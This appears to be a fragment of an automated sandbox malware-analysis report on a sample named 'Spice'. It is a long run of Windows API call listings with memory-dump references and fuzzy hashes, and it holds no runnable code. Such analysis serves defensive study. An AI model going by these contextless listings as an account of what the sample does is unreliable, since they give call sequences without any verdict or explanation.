                                                                                                                                                                                                                                        • Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3
                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E71B76
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00E71BDA
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00E71BF7
                                                                                                                                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E71C08
                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 00E71C52
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1827037458-0
                                                                                                                                                                                                                                      • Opcode ID: 6e0b4790b44177afdda96d31c71623141bb7989f6097ad97c5666eef01a1b618
                                                                                                                                                                                                                                      • Instruction ID: fbc761cecc57ed16cc6289f87c68aa815ebaf16e1d4fb1678db81117e9078c71
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e0b4790b44177afdda96d31c71623141bb7989f6097ad97c5666eef01a1b618
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA41D7701043049FD721DF68CC88FBA7BE9FB49374F144569F999972A1C7319805EB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShowWindow.USER32(00F377B0,00000000,013B5878,?,?,00F377B0,?,00EFBC1A,?,?), ref: 00EFBD84
                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00EFBDA8
                                                                                                                                                                                                                                      • ShowWindow.USER32(00F377B0,00000000,013B5878,?,?,00F377B0,?,00EFBC1A,?,?), ref: 00EFBE08
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000004,?,00EFBC1A,?,?), ref: 00EFBE1A
                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00EFBE3E
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00EFBE61
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 642888154-0
                                                                                                                                                                                                                                      • Opcode ID: 65774237e1f4240c23f706e300b590850dd8410e85eac211da1a113120f63b21
                                                                                                                                                                                                                                      • Instruction ID: ce8cbc920ecb4d95051ba81093e7d6da8917e66babf57ddd949f0dcc799848b5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65774237e1f4240c23f706e300b590850dd8410e85eac211da1a113120f63b21
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9541613460014CEFDB22CF18C489BE57BE5FF05318F1891A9EB489F2A2CB32A845CB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00EE550C,?,?,00000000,00000001), ref: 00EE7796
                                                                                                                                                                                                                                        • Part of subcall function 00EE406C: GetWindowRect.USER32(?,?), ref: 00EE407F
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00EE77C0
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00EE77C7
                                                                                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EE77F9
                                                                                                                                                                                                                                        • Part of subcall function 00ED57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5877
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EE7825
                                                                                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EE7883
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4137160315-0
                                                                                                                                                                                                                                      • Opcode ID: b23c79351279d882994d6f8236e32fa387934b259844a8789373b5a1a745b5a6
                                                                                                                                                                                                                                      • Instruction ID: fd0aebe65727915ff23c1e207557c6c44d2673ce73f1b2dda7e34580b24e6b00
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b23c79351279d882994d6f8236e32fa387934b259844a8789373b5a1a745b5a6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5831E172508359ABD724DF14DC49F9BB7EAFF88314F00091AF589A7181CB30E909CBA6
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EC8CDE
                                                                                                                                                                                                                                        • Part of subcall function 00EC8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EC8CE8
                                                                                                                                                                                                                                        • Part of subcall function 00EC8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EC8CF7
                                                                                                                                                                                                                                        • Part of subcall function 00EC8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EC8CFE
                                                                                                                                                                                                                                        • Part of subcall function 00EC8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EC8D14
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,00EC904D), ref: 00EC9482
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00EC948E
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00EC9495
                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00EC94AE
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00EC904D), ref: 00EC94C2
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00EC94C9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3008561057-0
                                                                                                                                                                                                                                      • Opcode ID: f1f59da48ea048276615682f9099aed0eae6a3d72a97ac23695a313c18ac7998
                                                                                                                                                                                                                                      • Instruction ID: 16777a5c82da45f55f5b2f967149151475f2b4fda24f602b83b745f8f8718972
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1f59da48ea048276615682f9099aed0eae6a3d72a97ac23695a313c18ac7998
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A211AC72501608EFDB289FA4CD89FAF7BB9FB4531AF10901CE855E7211CB369902DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EC9200
                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00EC9207
                                                                                                                                                                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EC9216
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00EC9221
                                                                                                                                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EC9250
                                                                                                                                                                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00EC9264
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1413079979-0
                                                                                                                                                                                                                                      • Opcode ID: c09d514c24d1368ff987c8a023de53a27ee9031fe2c77f2797e3a620fda184d4
                                                                                                                                                                                                                                      • Instruction ID: 8a6ba7046544d218c8d383f43db03f345cec9120c4ecc211cbcfa1c16c08113c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c09d514c24d1368ff987c8a023de53a27ee9031fe2c77f2797e3a620fda184d4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80114A7250120EABDF018F94ED4DFDE7BA9FB08709F044018FA04A2160CA769D61EB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00ECC34E
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00ECC35F
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ECC366
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00ECC36E
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00ECC385
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 00ECC397
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsDevice$Release
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1035833867-0
                                                                                                                                                                                                                                      • Opcode ID: c7600ec4eff5b9964d03a8f660ab4f747fe510ec2a3b4dadd48a9bb23163397f
                                                                                                                                                                                                                                      • Instruction ID: ab42ed1067e20b0a356afc762547df42e812b1647d1cadafcfb5c2732109a6af
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7600ec4eff5b9964d03a8f660ab4f747fe510ec2a3b4dadd48a9bb23163397f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2018471E00209BBEF109BA59D49F5EBFB8EB48711F004065FA08A7280DA319C11CFA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E71729
                                                                                                                                                                                                                                        • Part of subcall function 00E716CF: SelectObject.GDI32(?,00000000), ref: 00E71738
                                                                                                                                                                                                                                        • Part of subcall function 00E716CF: BeginPath.GDI32(?), ref: 00E7174F
                                                                                                                                                                                                                                        • Part of subcall function 00E716CF: SelectObject.GDI32(?,00000000), ref: 00E71778
                                                                                                                                                                                                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00EFC57C
                                                                                                                                                                                                                                      • LineTo.GDI32(00000000,00000003,?), ref: 00EFC590
                                                                                                                                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EFC59E
                                                                                                                                                                                                                                      • LineTo.GDI32(00000000,00000000,?), ref: 00EFC5AE
                                                                                                                                                                                                                                      • EndPath.GDI32(00000000), ref: 00EFC5BE
                                                                                                                                                                                                                                      • StrokePath.GDI32(00000000), ref: 00EFC5CE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 43455801-0
                                                                                                                                                                                                                                      • Opcode ID: bc0761f08a089a209894235794ab7a1f4979693a2dc580749cbd5bfc6acca5cb
                                                                                                                                                                                                                                      • Instruction ID: e46c6ee7af02a305c7e9d0486381a0dd7df8e00775e4e7fc9836daab85f086d3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc0761f08a089a209894235794ab7a1f4979693a2dc580749cbd5bfc6acca5cb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B611DB7600420DBFDF129F94DC88FAA7FADFF08364F148051BA185A160DB71AE55EBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E907EC
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E907F4
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E907FF
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E9080A
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E90812
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9081A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Virtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4278518827-0
                                                                                                                                                                                                                                      • Opcode ID: 867ec9caca53b297a43c7514f5273fdd4377f13cae9113d0da7af54f07f20ae8
                                                                                                                                                                                                                                      • Instruction ID: 1d5b8e992f6f6f2651de8bce03707d581577eecf23b8dd84b66e65d79a89fb08
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 867ec9caca53b297a43c7514f5273fdd4377f13cae9113d0da7af54f07f20ae8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00ED59B4
                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00ED59CA
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00ED59D9
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED59E8
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED59F2
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED59F9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 839392675-0
                                                                                                                                                                                                                                      • Opcode ID: d02c1051a3d4ec469064abfc3163c50092664f099d618901b13d83f8ddcb082c
                                                                                                                                                                                                                                      • Instruction ID: 190a3ab01e98aa75e4569199b8c5edd59a955ed8d98c14f64cef7c8a5812f460
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d02c1051a3d4ec469064abfc3163c50092664f099d618901b13d83f8ddcb082c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93F01D3224115CBBE7215B929C0DFEF7A7CFBC6B11F000159FA0591050DFA11A1196B5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00ED77FE
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00E7C2B6,?,?), ref: 00ED780F
                                                                                                                                                                                                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00E7C2B6,?,?), ref: 00ED781C
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E7C2B6,?,?), ref: 00ED7829
                                                                                                                                                                                                                                        • Part of subcall function 00ED71F0: CloseHandle.KERNEL32(00000000,?,00ED7836,?,00E7C2B6,?,?), ref: 00ED71FA
                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ED783C
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00E7C2B6,?,?), ref: 00ED7843
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3495660284-0
                                                                                                                                                                                                                                      • Opcode ID: 8f4bbae2b0439b58267779940601cd4da7439be131df7b7a9e621b6784fe67d6
                                                                                                                                                                                                                                      • Instruction ID: dd5845f2388400426cdea5dbaf81dd296eb9b4c0452807f3655a0d06f759c864
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f4bbae2b0439b58267779940601cd4da7439be131df7b7a9e621b6784fe67d6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38F0A036145216EFD7222B64EC8CBEB777AFF49306F142422F243A51A0DFB55802EB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EC9555
                                                                                                                                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00EC9561
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EC956A
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EC9572
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC957B
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00EC9582
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 146765662-0
                                                                                                                                                                                                                                      • Opcode ID: 9f90bf435fb96d11ed5254d4c5eb9bb8c6e51c0933a3dc40ca6adb26d49611e1
